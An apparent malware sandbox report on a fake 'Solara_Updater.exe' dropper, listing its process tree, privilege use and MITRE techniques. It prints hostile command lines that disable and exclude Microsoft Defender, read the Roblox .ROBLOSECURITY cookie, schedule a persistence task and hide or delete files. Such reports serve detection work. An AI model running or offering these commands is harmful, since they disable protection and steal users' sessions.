Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	sol.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
1396	PING.EXE
3680	PING.EXE
820	PING.EXE
4040	PING.EXE
5660	PING.EXE
5100	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3340	RustCheat.exe
3340	RustCheat.exe
1736	powershell.exe
1736	powershell.exe
1736	powershell.exe
2052	powershell.exe
2052	powershell.exe
2052	powershell.exe
3680	powershell.exe
3680	powershell.exe
3680	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
1964	powershell.exe
1964	powershell.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
1964	powershell.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe
4328	bridgeblockportComBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	Loader.exe
Token: SeDebugPrivilege	3376	XClient.exe
Token: SeDebugPrivilege	3340	RustCheat.exe
Token: SeIncreaseQuotaPrivilege	3196	wmic.exe
Token: SeSecurityPrivilege	3196	wmic.exe
Token: SeTakeOwnershipPrivilege	3196	wmic.exe
Token: SeLoadDriverPrivilege	3196	wmic.exe
Token: SeSystemProfilePrivilege	3196	wmic.exe
Token: SeSystemtimePrivilege	3196	wmic.exe
Token: SeProfSingleProcessPrivilege	3196	wmic.exe
Token: SeIncBasePriorityPrivilege	3196	wmic.exe
Token: SeCreatePagefilePrivilege	3196	wmic.exe
Token: SeBackupPrivilege	3196	wmic.exe
Token: SeRestorePrivilege	3196	wmic.exe
Token: SeShutdownPrivilege	3196	wmic.exe
Token: SeDebugPrivilege	3196	wmic.exe
Token: SeSystemEnvironmentPrivilege	3196	wmic.exe
Token: SeRemoteShutdownPrivilege	3196	wmic.exe
Token: SeUndockPrivilege	3196	wmic.exe
Token: SeManageVolumePrivilege	3196	wmic.exe
Token: 33	3196	wmic.exe
Token: 34	3196	wmic.exe
Token: 35	3196	wmic.exe
Token: 36	3196	wmic.exe
Token: SeIncreaseQuotaPrivilege	3196	wmic.exe
Token: SeSecurityPrivilege	3196	wmic.exe
Token: SeTakeOwnershipPrivilege	3196	wmic.exe
Token: SeLoadDriverPrivilege	3196	wmic.exe
Token: SeSystemProfilePrivilege	3196	wmic.exe
Token: SeSystemtimePrivilege	3196	wmic.exe
Token: SeProfSingleProcessPrivilege	3196	wmic.exe
Token: SeIncBasePriorityPrivilege	3196	wmic.exe
Token: SeCreatePagefilePrivilege	3196	wmic.exe
Token: SeBackupPrivilege	3196	wmic.exe
Token: SeRestorePrivilege	3196	wmic.exe
Token: SeShutdownPrivilege	3196	wmic.exe
Token: SeDebugPrivilege	3196	wmic.exe
Token: SeSystemEnvironmentPrivilege	3196	wmic.exe
Token: SeRemoteShutdownPrivilege	3196	wmic.exe
Token: SeUndockPrivilege	3196	wmic.exe
Token: SeManageVolumePrivilege	3196	wmic.exe
Token: 33	3196	wmic.exe
Token: 34	3196	wmic.exe
Token: 35	3196	wmic.exe
Token: 36	3196	wmic.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	1936	Loader.exe
Token: SeDebugPrivilege	2728	XClient.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeIncreaseQuotaPrivilege	4340	wmic.exe
Token: SeSecurityPrivilege	4340	wmic.exe
Token: SeTakeOwnershipPrivilege	4340	wmic.exe
Token: SeLoadDriverPrivilege	4340	wmic.exe
Token: SeSystemProfilePrivilege	4340	wmic.exe
Token: SeSystemtimePrivilege	4340	wmic.exe
Token: SeProfSingleProcessPrivilege	4340	wmic.exe
Token: SeIncBasePriorityPrivilege	4340	wmic.exe
Token: SeCreatePagefilePrivilege	4340	wmic.exe
Token: SeBackupPrivilege	4340	wmic.exe
Token: SeRestorePrivilege	4340	wmic.exe
Token: SeShutdownPrivilege	4340	wmic.exe
Token: SeDebugPrivilege	4340	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 1732	3460	Solara_Updater.exe	95
PID 3460 wrote to memory of 1732	3460	Solara_Updater.exe	95
PID 3460 wrote to memory of 1276	3460	Solara_Updater.exe	96
PID 3460 wrote to memory of 1276	3460	Solara_Updater.exe	96
PID 3460 wrote to memory of 1276	3460	Solara_Updater.exe	96
PID 3460 wrote to memory of 5116	3460	Solara_Updater.exe	97
PID 3460 wrote to memory of 5116	3460	Solara_Updater.exe	97
PID 1276 wrote to memory of 4396	1276	sol.exe	100
PID 1276 wrote to memory of 4396	1276	sol.exe	100
PID 1276 wrote to memory of 4396	1276	sol.exe	100
PID 5116 wrote to memory of 1936	5116	Solara_Updater.exe	103
PID 5116 wrote to memory of 1936	5116	Solara_Updater.exe	103
PID 5116 wrote to memory of 2480	5116	Solara_Updater.exe	104
PID 5116 wrote to memory of 2480	5116	Solara_Updater.exe	104
PID 5116 wrote to memory of 2480	5116	Solara_Updater.exe	104
PID 5116 wrote to memory of 1072	5116	Solara_Updater.exe	105
PID 5116 wrote to memory of 1072	5116	Solara_Updater.exe	105
PID 1732 wrote to memory of 3376	1732	Loader.exe	107
PID 1732 wrote to memory of 3376	1732	Loader.exe	107
PID 1732 wrote to memory of 3340	1732	Loader.exe	108
PID 1732 wrote to memory of 3340	1732	Loader.exe	108
PID 2480 wrote to memory of 3660	2480	sol.exe	109
PID 2480 wrote to memory of 3660	2480	sol.exe	109
PID 2480 wrote to memory of 3660	2480	sol.exe	109
PID 3340 wrote to memory of 3196	3340	RustCheat.exe	111
PID 3340 wrote to memory of 3196	3340	RustCheat.exe	111
PID 3340 wrote to memory of 2388	3340	RustCheat.exe	132
PID 3340 wrote to memory of 2388	3340	RustCheat.exe	132
PID 3340 wrote to memory of 1736	3340	RustCheat.exe	115
PID 3340 wrote to memory of 1736	3340	RustCheat.exe	115
PID 3340 wrote to memory of 2052	3340	RustCheat.exe	117
PID 3340 wrote to memory of 2052	3340	RustCheat.exe	117
PID 3340 wrote to memory of 3680	3340	RustCheat.exe	119
PID 3340 wrote to memory of 3680	3340	RustCheat.exe	119
PID 1072 wrote to memory of 1060	1072	Solara_Updater.exe	121
PID 1072 wrote to memory of 1060	1072	Solara_Updater.exe	121
PID 1072 wrote to memory of 2388	1072	Solara_Updater.exe	132
PID 1072 wrote to memory of 2388	1072	Solara_Updater.exe	132
PID 1072 wrote to memory of 2388	1072	Solara_Updater.exe	132
PID 1072 wrote to memory of 5116	1072	Solara_Updater.exe	123
PID 1072 wrote to memory of 5116	1072	Solara_Updater.exe	123
PID 2388 wrote to memory of 4380	2388	sol.exe	124
PID 2388 wrote to memory of 4380	2388	sol.exe	124
PID 2388 wrote to memory of 4380	2388	sol.exe	124
PID 1936 wrote to memory of 2728	1936	Loader.exe	126
PID 1936 wrote to memory of 2728	1936	Loader.exe	126
PID 3340 wrote to memory of 3852	3340	RustCheat.exe	127
PID 3340 wrote to memory of 3852	3340	RustCheat.exe	127
PID 1936 wrote to memory of 3896	1936	Loader.exe	129
PID 1936 wrote to memory of 3896	1936	Loader.exe	129
PID 3340 wrote to memory of 4340	3340	RustCheat.exe	130
PID 3340 wrote to memory of 4340	3340	RustCheat.exe	130
PID 3340 wrote to memory of 2388	3340	RustCheat.exe	132
PID 3340 wrote to memory of 2388	3340	RustCheat.exe	132
PID 3340 wrote to memory of 4496	3340	RustCheat.exe	134
PID 3340 wrote to memory of 4496	3340	RustCheat.exe	134
PID 3340 wrote to memory of 1892	3340	RustCheat.exe	136
PID 3340 wrote to memory of 1892	3340	RustCheat.exe	136
PID 3340 wrote to memory of 4204	3340	RustCheat.exe	138
PID 3340 wrote to memory of 4204	3340	RustCheat.exe	138
PID 5116 wrote to memory of 2772	5116	Solara_Updater.exe	140
PID 5116 wrote to memory of 2772	5116	Solara_Updater.exe	140
PID 5116 wrote to memory of 4004	5116	Solara_Updater.exe	141
PID 5116 wrote to memory of 4004	5116	Solara_Updater.exe	141

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4056	attrib.exe
2388	attrib.exe
1836	attrib.exe
5200	attrib.exe
1648	attrib.exe
5308	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5856
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
      4⤵
      Creates scheduled task(s)
      PID:6060
- - C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3340
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
      4⤵
      Views/modifies file attributes
      PID:2388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3852
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4340
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2388
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1892
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4204
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
      4⤵
      PID:376
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:1396
- C:\Users\Admin\AppData\Local\Temp\sol.exe
  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
    3⤵
    PID:4396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
      4⤵
      PID:2168
    - - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4328
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.cmdline"
        6⤵
        Drops file in Program Files directory
        
        PID:5456
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DB9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP"
        7⤵
        
        PID:5552
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ighgjthm\ighgjthm.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:5704
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E94.tmp" "c:\Windows\System32\CSC174D5A98CE104C60BF24872A9DF0C71.TMP"
        7⤵
        
        PID:5856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ch2d9wbArz.bat"
        6⤵
        
        PID:436
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3852
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:5720
        
        C:\Recovery\WindowsRE\RuntimeBroker.exe
        
        "C:\Recovery\WindowsRE\RuntimeBroker.exe"
        7⤵
        Executes dropped EXE
        
        PID:396
- C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2728
  - - C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
      "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
      4⤵
      Executes dropped EXE
      PID:3896
- - C:\Users\Admin\AppData\Local\Temp\sol.exe
    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
      4⤵
      Checks computer location settings
      PID:3660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        5⤵
        
        PID:5216
      - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        6⤵
        Executes dropped EXE
        
        PID:5316
- - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
      4⤵
      Executes dropped EXE
      PID:1060
    - - C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        5⤵
        Executes dropped EXE
        
        PID:5532
    - - C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5608
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:6080
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        
        PID:5316
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:6036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:2160
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:5508
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:5816
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:5164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        
        PID:5536
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4920
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        6⤵
        
        PID:3856
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:3680
  - - C:\Users\Admin\AppData\Local\Temp\sol.exe
      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2388
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        5⤵
        
        PID:4380
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        6⤵
        
        PID:4848
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        7⤵
        Executes dropped EXE
        
        PID:6100
  - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5116
    - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4004
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        6⤵
        Checks computer location settings
        
        PID:4144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        7⤵
        
        PID:5504
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        8⤵
        Executes dropped EXE
        
        PID:5508
    - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        5⤵
        
        PID:1672
      - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2020
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        7⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        8⤵
        
        PID:5184
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        9⤵
        Executes dropped EXE
        
        PID:5484
      - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        6⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2552
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        8⤵
        Checks computer location settings
        
        PID:4564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        9⤵
        
        PID:4648
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        10⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        7⤵
        Checks computer location settings
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1472
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        9⤵
        Checks computer location settings
        
        PID:2596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        10⤵
        
        PID:5872
        
